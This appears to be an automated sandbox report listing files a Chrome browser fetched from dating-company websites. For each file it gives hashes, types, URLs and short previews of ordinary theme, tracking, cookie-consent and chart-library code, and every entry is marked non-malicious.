                                                                                                                                                                                                                                                                                Preview:@charset "UTF-8";/*!..Theme Name: Monstroid2..Theme URI: http://www.templatemonster.com/wordpress-themes.php..Author: Template Monster..Author URI: http://www.templatemonster.com/..Description: Monstroid2 - truely multipurpose WordPress theme for real life projects. Built with love and care by TemplateMonster...Version: 1.2.0..License: GNU General Public License v3 or later..License URI: http://www.gnu.org/licenses/gpl-3.0.html..Text Domain: monstroid2..Tags: one-column, two-columns, three-columns, left-sidebar, right-sidebar, custom-background, custom-colors, custom-menu, featured-images, post-formats, sticky-post, theme-options, threaded-comments, translation-ready, grid-layout, custom-header, custom-logo, footer-widgets, flexible-header, blog..DocumentationID: monstroid_2..Template Id: 62222....This theme, like WordPress, is licensed under the GPL...Use it to make something cool, have fun, and share what you've learned with others.....Monstroid2 is based on Underscores http://unders
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (18419)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):127454
                                                                                                                                                                                                                                                                                Entropy (8bit):5.342529445441038
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:sIOPbLwq/UYXFyrIc1k+KMuCN++AGecUkCUQWDVk+:sIOPbLwq/9XFyrIe+IDVn
                                                                                                                                                                                                                                                                                MD5:CFAA6F6E4D885D902C8F8B764DDAB275
                                                                                                                                                                                                                                                                                SHA1:CF3A9597D7391BE1C48E4E5AE9794F3077DCBB25
                                                                                                                                                                                                                                                                                SHA-256:7C2F6A73603393449A2C35739E445711339E98A56493B9DE66505C740A035C33
                                                                                                                                                                                                                                                                                SHA-512:968FB54208CD02F9C7916967CFED3F856E519CA0F007647DBAF8775F3AE4BB462D30A0BE0389CCDBE8758AE79197359425185843FE7CA1F1F3A881D91FB17EE8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://www.spark.net/our-story/
                                                                                                                                                                                                                                                                                Preview:<!doctype html>.<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" >. <head>. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <meta name="viewport" content="width=device-width, initial-scale=1">. This is Squarespace. --> tomato-lion-m6jc -->.<base href="">.<meta charset="utf-8" />.<title>Our Story &mdash; Spark Networks</title>.<meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /><link rel="icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/de749afd-25b3-4000-88ee-3f3a2db2061b/favicon.ico?format=100w"/>.<link rel="canonical" href="https://www.spark.net/our-story"/>.<meta property="og:site_name" content="Spark Networks"/>.<meta property="og:title" content="Our Story &mdash; Spark Networks"/>.<meta property="og:url" content="https://www.spark.net/our-story"/>.<meta property="og:type" content="website"/>.<meta
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://alb.reddit.com/rp.gif?ts=1728225781827&id=a2_fcfvqg5hztts&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=e049edff-96bd-4808-a785-abfedcfc59f6&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc=
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65509)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):72704
                                                                                                                                                                                                                                                                                Entropy (8bit):5.38426970422447
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:+Fb2Ih8RSBpBHYIZkb3A2FCKdt3dU7/1tQ84k2c7FNBA1sVxOzT0W:+Fb2XYCkytuT1m8jFu4Oz9
                                                                                                                                                                                                                                                                                MD5:953318B6112455DA3B1BE1098643DA60
                                                                                                                                                                                                                                                                                SHA1:461028FB6BA6027C132260B4134F27DB8AF97EC8
                                                                                                                                                                                                                                                                                SHA-256:B8807A9D7CE255DA8E64EEB076B9962122A8A57A5B73FC70F430909A29CFAFEE
                                                                                                                                                                                                                                                                                SHA-512:303A5A98D5E1145B70E5C5CD46D6DC4CC9325183E7F8533A0B8547EA450D88EE8E165944F502D0C717EA3AB1591B29E31163062F74020D293321F9C15B5B5AC6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.taboola.com/libtrc/unip/1121901/tfa.js
                                                                                                                                                                                                                                                                                Preview:/*! 20241006-3-RELEASE */..function _typeof(t){"@babel/helpers - typeof";return(_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}!function(t){var e='TFASC';e.indexOf("{jsScope}")>-1&&(e="TRC"),t[e]||(t[e]={})}(window),function(t,e){t.TRC=t.TRC||{};var n=function t(){return!0},r=function n(r,i,o,a){var s=r+"/"+encodeURIComponent(o||t.TRC.publisherId)+"/log/3"+"/"+i;return a&&(s+="?"+e.TRCLogger.formatParams(a)),s},i=function e(r,i,a,s){var c,u=new(t.XDomainRequest||t.XMLHttpRequest);return u.open(r,i),u.onload="function"==typeof s?s:n,u.onerror=n,u.ontimeout=n,u.onprogress=n,u.withCredentials=!0,a&&o(u,a),u},o=function t(e,n){for(var r in n)n.hasOwnProperty(r)&&e.setRequestHeader(r,n[r])};t.TRC.TRCLogger=e.TRCLogger={post:function n(o,a,s,c,u,l){var f=r(o,a,c,u),d=i("POST",f);l&&"function"==typeof t.navigator.sendBeacon?t.na
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (19332)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):21139
                                                                                                                                                                                                                                                                                Entropy (8bit):5.566201267708957
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:TZVAf6V7uck2UQYU/kWW/pijrC74Bh4BWjLpPikHHsZO1UkpfX:TZif6V6cjUQYU/kWWg/CMBqBWRTE4fX
                                                                                                                                                                                                                                                                                MD5:D3E6F20ED54713AB6D53941FA2FAAE0C
                                                                                                                                                                                                                                                                                SHA1:ACEFBD32229D7C907C80BE075F6B24E9864884EE
                                                                                                                                                                                                                                                                                SHA-256:4978BAB6B8CE7938415CFBBD1AEAF96E5D00AC99282D8BE41F7F61797F81552A
                                                                                                                                                                                                                                                                                SHA-512:190D9D4445A6492CEFC3E488A8F8D22B953C19C246F179B16C93701A1E4D25DC4E654EB60F2952724C9BBE7E4F3DE969C210515D3877618731DFD88448FFC41A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[84467],{159393:(_,a)=>{"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=void 0;var t;(function(r){r.SUB_FOOTER="SUB_FOOTER",r.PILL="PILL",r.HIDDEN="HIDDEN"})(t||(t={}));var s=t;a.default=s,_.exports=a.default},418891:_=>{_.exports={"2a55ca78e8124468fd12f5631b591477":"Cookie banner","5c9e9d0cbf6046deb40eaa0a5c1722df":"These cookies provide quantitative measures of website visitors. With the usage of these cookies we are able to count visits and traffic sources to improve the performance of our site.","5d34f2ee7358fc231e5c0fb44bb6194d":"Close","67db752e6310686617e98c22c85b3963":"Necessary","6bf1c5ed97ddc6828e7cd5159df2a240":"Performance and Analytics","74472054366bb6c5316e7afadad1093e":"These cookies are used by advertising companies to serve ads that are relevant to your interests.","7f55fe8fa38cccf52495082b8a3b514e":"Required to enable core site functionality and to remember user preferences a
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2224
                                                                                                                                                                                                                                                                                Entropy (8bit):4.495676169349362
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:p+aFUyHT42gwFmbwWA5Lv5c6ozyH2sb0WaENAeTqrKc11stt3:pnFUyHawsqVv5CzyW0aKNWKEOp
                                                                                                                                                                                                                                                                                MD5:06017FE3F68A46BBB80A645746261330
                                                                                                                                                                                                                                                                                SHA1:0948B6722519DD2FAF03810470D66D99C421563D
                                                                                                                                                                                                                                                                                SHA-256:3E142ED154956C1787255090A0731BFC9EB07B836122F8529938E8EB578BDA46
                                                                                                                                                                                                                                                                                SHA-512:ACD2CA56F0D2EC5113E2BB733F0C4C5916D8AD2EB0204895918BBDD3C005E0B6BD2332FF2390E3BEDAC78C653AE21ACC6BE5702238243156E2F6985FC02DA57A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/tm-hash.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:var tm_hash_module_seperator = '||',. tm_hash_module_param_seperator = '|';..function process_tm_hashchange( hash ) {. if ( ( hash.indexOf( tm_hash_module_seperator, 0 ) ) !== -1 ) {. modules = hash.split( tm_hash_module_seperator );. for ( var i = 0; i < modules.length; i++ ) {. var module_params = modules[i].split( tm_hash_module_param_seperator );. var element = module_params[0];. module_params.shift();. if ( $('#' + element ).length ) {. $('#' + element ).trigger({. type: "tm_hashchange",. params: module_params. });. }. }. } else {. module_params = hash.split( tm_hash_module_param_seperator );. var element = module_params[0];. module_params.shift();. if ( $('#' + element ).length ) {. $('#' + element ).trigger({. type: "tm_hashchange",. params: module_params. });. }. }.}..function tm_set_hash( module_state_hash ) {. module_id = module_state_hash.split( tm_hash_module_param_
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                                                MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                                                SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                                                SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                                                SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.............,..............;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):651429
                                                                                                                                                                                                                                                                                Entropy (8bit):5.844228243807767
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:LSfFv/rwwMdW1ycHsVG02XRwgORDiO3brExZ788jHf3jUEcJ+U/xZ52J2EXNMve5:efB/rwVd9cHouXjxN3wl/W2EX8G
                                                                                                                                                                                                                                                                                MD5:5AF41E7B4416873B171E4ACCB4B60B1D
                                                                                                                                                                                                                                                                                SHA1:2C8D91BDEE42AAC24EE4BFB80A59DA955FD99DC3
                                                                                                                                                                                                                                                                                SHA-256:0C0A365C16D896348DF4DE6DA13178A97B72C35CED08BF51C455D2886AD4BB25
                                                                                                                                                                                                                                                                                SHA-512:257607643028E04DF815F2CC33797575B6049EFB3029614E4B1BC3A3A2A101E242B324333AA79E4C632321FCE80C2AD071133F3826AF18631CD262B3DE5E85ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/common-vendors-bfa4951cbb922ca49214-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:(function() {var u1=Object.defineProperty,c1=Object.defineProperties;var l1=Object.getOwnPropertyDescriptors;var ai=Object.getOwnPropertySymbols;var m1=Object.prototype.hasOwnProperty,d1=Object.prototype.propertyIsEnumerable;var on=(m,l)=>(l=Symbol[m])?l:Symbol.for("Symbol."+m);var oi=(m,l,i)=>l in m?u1(m,l,{enumerable:!0,configurable:!0,writable:!0,value:i}):m[l]=i,Ln=(m,l)=>{for(var i in l||(l={}))m1.call(l,i)&&oi(m,i,l[i]);if(ai)for(var i of ai(l))d1.call(l,i)&&oi(m,i,l[i]);return m},ii=(m,l)=>c1(m,l1(l));var Nr=(m,l,i)=>new Promise((s,r)=>{var d=E=>{try{p(i.next(E))}catch(g){r(g)}},f=E=>{try{p(i.throw(E))}catch(g){r(g)}},p=E=>E.done?s(E.value):Promise.resolve(E.value).then(d,f);p((i=i.apply(m,l)).next())}),sn=function(m,l){this[0]=m,this[1]=l},si=(m,l,i)=>{var s=(f,p,E,g)=>{try{var y=i[f](p),b=(p=y.value)instanceof sn,A=y.done;Promise.resolve(b?p[0]:p).then(S=>b?s(f==="return"?f:"next",p[1]?{done:S.done,value:S.value}:S,E,g):E({value:S,done:A})).catch(S=>s("throw",S,E,g))}catch(S){
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9193
                                                                                                                                                                                                                                                                                Entropy (8bit):5.058820345357118
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:Xbr5ul0lG2Ywr+o53PsoSOBDP4l5EHIjgn7Bt1En7IeayvKOXpETqK:Xbr51l+o53PsoTDP4sugnM7s9
                                                                                                                                                                                                                                                                                MD5:63B27E66B6B47B9523E199CDD81AE663
                                                                                                                                                                                                                                                                                SHA1:18E1A1AA46F5EF2E6FB113ABBAC56F7962F5034D
                                                                                                                                                                                                                                                                                SHA-256:1FE913B24CFA0724F4292DB1745D7E4D816FBE08CE658AD17E657BD52892C686
                                                                                                                                                                                                                                                                                SHA-512:D9C381644884F17409DB1FCF71469A7928C9A8EB8AE3E45DAE9EF6A69D3B45E3D5ED8C8EBE98D9A1BD64A6443618683F02F6CE82FBD36E69CCD9611DC769F80D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/**!. * easyPieChart. * Lightweight plugin to render simple, animated and retina optimized pie charts. *. * @license . * @author Robert Fleischmann <rendro87@gmail.com> (http://robert-fleischmann.de). * @version 2.1.5. **/..(function(root, factory) {. if(typeof exports === 'object') {. module.exports = factory(require('jquery'));. }. else if(typeof define === 'function' && define.amd) {. define(['jquery'], factory);. }. else {. factory(root.jQuery);. }.}(this, function($) {../**. * Renderer to render the chart on a canvas object. * @param {DOMElement} el DOM element to host the canvas (root of the plugin). * @param {object} options options object of the plugin. */.var CanvasRenderer = function(el, options) {..var cachedBackground;..var canvas = document.createElement('canvas');...el.appendChild(canvas);...if (typeof(G_vmlCanvasManager) !== 'undefined') {...G_vmlCanvasManager.initElement(canvas);..}...var ctx = canvas.getContext('2d');...c
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (43878), with NEL line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):117609
                                                                                                                                                                                                                                                                                Entropy (8bit):5.452021285934095
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:bocmEAoU4k8rNnI/JrB5DCbFN+srq7Tgk09F/yUblX8Q:YoUWNI/J3QqSLL
                                                                                                                                                                                                                                                                                MD5:93A2AEA230D421D550375C528B22583E
                                                                                                                                                                                                                                                                                SHA1:E8D88B00DB1C30510928A7C6618F0F7CFFA9B4C2
                                                                                                                                                                                                                                                                                SHA-256:54E832663426C696B1F603379026E5E15720E8C812BBBC60D63AA2AD8A479F75
                                                                                                                                                                                                                                                                                SHA-512:2BA5180B32FCD62B7A430E75C8CD8022076563299F055AD99B836AFBAEB39D205D825B2848E0686F7E136502EAAE91B39B4659D6C1F6A0895C16FA5515494EED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(()=>{var t,r={481:(t,r,e)=>{var n=e(8807),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a function")}},2420:(t,r,e)=>{var n=e(1758),o=e(8427),i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not a constructor")}},5946:(t,r,e)=>{var n=e(8807),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||n(t))return t;throw i("Can't set "+o(t)+" as a prototype")}},3288:(t,r,e)=>{var n=e(6982),o=e(6042),i=e(189).f,a=n("unscopables"),s=Array.prototype;null==s[a]&&i(s,a,{configurable:!0,value:o(null)}),t.exports=function(t){s[a][t]=!0}},5158:(t,r,e)=>{"use strict";var n=e(3100).charAt;t.exports=function(t,r,e){return r+(e?n(t,r).length:1)}},5712:(t,r,e)=>{var n=e(3521),o=TypeError;t.exports=function(t,r){if(n(r,t))return t;throw o("Incorrect invocation")}},1843:(t,r,e)=>{var n=e(1188),o=String,i=TypeError;t.exports=function(t){if(n(t))return t;throw i(o(t)+" is not an object")}},7603:t=>{t.exports="undefined"!=typeof ArrayBuffer&
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (22462)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):22463
                                                                                                                                                                                                                                                                                Entropy (8bit):5.308411760782321
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:n83CmwWtdvD5ABwXCQ+3rpheTJ8eMAB6LxbnmcY2Jo7pJ:ndmw0D5ABwXGdheTJHexzeJ
                                                                                                                                                                                                                                                                                MD5:01D681C49BE80A4B603C59E89B87920C
                                                                                                                                                                                                                                                                                SHA1:5A75464EF4E504564DB1D39BEBED538F564B770E
                                                                                                                                                                                                                                                                                SHA-256:EFAD755939E511F2BC1FEB0D58D6014006E8598A4D431F27A66DD59E14FC19CB
                                                                                                                                                                                                                                                                                SHA-512:9579D6E8FFFB1E6D343974693C7AB06A04ACE91FD2D80782E3D3ACE8566C60493FC3AC4FCCECE8A2B79D24ABDC183019D4EF86DEB18FAC86CDF49F24A7B1FDED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                                                                                                                                                                                                                                Preview:var OneTrustStub=function(t){"use strict";var a,o,l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.vendorsServiceData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.domPurifyScriptName="otDomPurify.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:"",stateName:""}};(g=v=v||{})[g.Days=1]="Days",g[g.Weeks=7]="Weeks",g[g.Months=30]="Months",g[g.Years=365]="Years",(g=i=i
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                Entropy (8bit):4.612457348662773
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLV/VfsqPNVcSLQzRE9Ldu1S4:YWLV9soDLQmpdwS4
                                                                                                                                                                                                                                                                                MD5:69EE36929D2172DEA5C1763BAC240040
                                                                                                                                                                                                                                                                                SHA1:77EF82FC4B7757D445E8901E16D785AA44E3B1DF
                                                                                                                                                                                                                                                                                SHA-256:45DA241A91C843B268ADA7481CDECE1AA679F2720931EFFEA28D83E1398D66A9
                                                                                                                                                                                                                                                                                SHA-512:FDA2E41AF332441315A0BC6352DD1B9350F92E13447CD1A58CBAA96748271C26780A653EA94F023808F572D1E329C855EF6A0E3B51558BF474ABA614AB26051A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/a2_fcfvqg5hztts_telemetry
                                                                                                                                                                                                                                                                                Preview:{"version_hash":"8d515a58","url":"https://www.redditstatic.com/ads/8d515a58/pixel.js"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):416
                                                                                                                                                                                                                                                                                Entropy (8bit):6.986452293849356
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:6v/7sAt0+dDqmh8BROIrWkTMB91rGhI+gBdpUf+7:hadDR4ROIakTW9xGeLB7
                                                                                                                                                                                                                                                                                MD5:B45B49DF5EED87C4C880C5880C8B4F1F
                                                                                                                                                                                                                                                                                SHA1:DFBFD5582621B8A960D648F830F200B451613B28
                                                                                                                                                                                                                                                                                SHA-256:5CEF37BD9F7FBFCD869B22E9E35ABF92378ABDD09E3F715530F74A62E564A68D
                                                                                                                                                                                                                                                                                SHA-512:3B7DF07EAAFAFA5A6A64D6293639CE378A557E4F9DC5790D7C820EE8AB82943ABCD2988E5B13F9C0EDA19990F218FA64F58DAB6C38BB93F2619034837216E6DB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/b45b49df5eed87c4c880c5880c8b4f1f.png
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....D......QPLTE...........W..W..i..z..y.."..?..q.."..i..a........N..B..*..7..x.....................tRNS.?....?......L....IDAT8...r. .@.E....!.....A.......pK.!.sPy.T.........;.;..C...tF.?...}.:D..c3".4....q[...(..0..B....1..L...h.6!.....)...D.].hC.[2..c...1......3...B.r...EF......M.,=..."..6"....T.g....2p.....H.R..$.]NaZ.F.....a...i.r..D./.....V.#.......x.../.j.Sa....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):15560
                                                                                                                                                                                                                                                                                Entropy (8bit):4.552622484646198
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:JTrEjk3Vmt9YCIHsLUw8XoAfY/N9u91lQ8E:BrEjk3VmtKCZLUOAaCQ8E
                                                                                                                                                                                                                                                                                MD5:4E27313156FC6087882F7F669CD7C702
                                                                                                                                                                                                                                                                                SHA1:E2D0D190797C9994F9D98F0C61BDED23F8021AAE
                                                                                                                                                                                                                                                                                SHA-256:785B2102F538E88A3C1D3535CF5E3E0786D2CD3518F1B8F5D656DAB7CB9F3505
                                                                                                                                                                                                                                                                                SHA-512:8346ED6A2340F7B8C075DF702D038C48CD3AADAE0CD79F19DF2A9721CE3CABD275525666A06B4DAF32B8E16E6E48E428D0740B9B07D8EFFC6FA3BDCAB335E886
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function($) {. $.tm_pb_simple_slider = function(el, options) {. var settings = $.extend( {. slide ...: '.tm-slide',.... .// slide class. arrows.....: '.tm-pb-slider-arrows',..// arrows container class. prev_arrow....: '.tm-pb-arrow-prev',...// left arrow class. next_arrow....: '.tm-pb-arrow-next',...// right arrow class. controls ....: '.tm-pb-controllers a',..// control selector. carousel_controls ..: '.tm_pb_carousel_item',..// carousel control selector. control_active_class.: 'tm-pb-active-control',..// active control class name. previous_text...: tm_pb_custom.previous,...// previous arrow text. next_text....: tm_pb_custom.next,....// next arrow text. fade_speed....: 500,.......// fade effect speed. use_arrows....: true,.......// use arrows?. use_controls...: true,.......// use controls?. manual_arrows...: '',.......// html code for custom arrows. append_controls_to..: '',.......// controls are append
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65467)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):266749
                                                                                                                                                                                                                                                                                Entropy (8bit):5.228193094831099
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:aoIU2dSBcvXVHOsUvH60ct9ltNj0LsNMMg9ixQ:aox2dhus8HqCsNM9
                                                                                                                                                                                                                                                                                MD5:65E26242174E7F2D8845E29AA884AD31
                                                                                                                                                                                                                                                                                SHA1:D4839F4DBDF592B943AB233384D5FD25445447FA
                                                                                                                                                                                                                                                                                SHA-256:75C0D8550E4EFF9E0B53BDA398AF84ABEA910F72360D54DDD3353ADC2E2E2487
                                                                                                                                                                                                                                                                                SHA-512:1AA58D2CD5AC77459FFE543B6EFFA8256E74EEC36EF573C1FF75A78D4D46B6CF3E03F0B35865120E62F3608551801C34CE3351FD340CE84EE47D7A12CA1B0631
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.65e26242174e7f2d8845e29aa884ad31.js
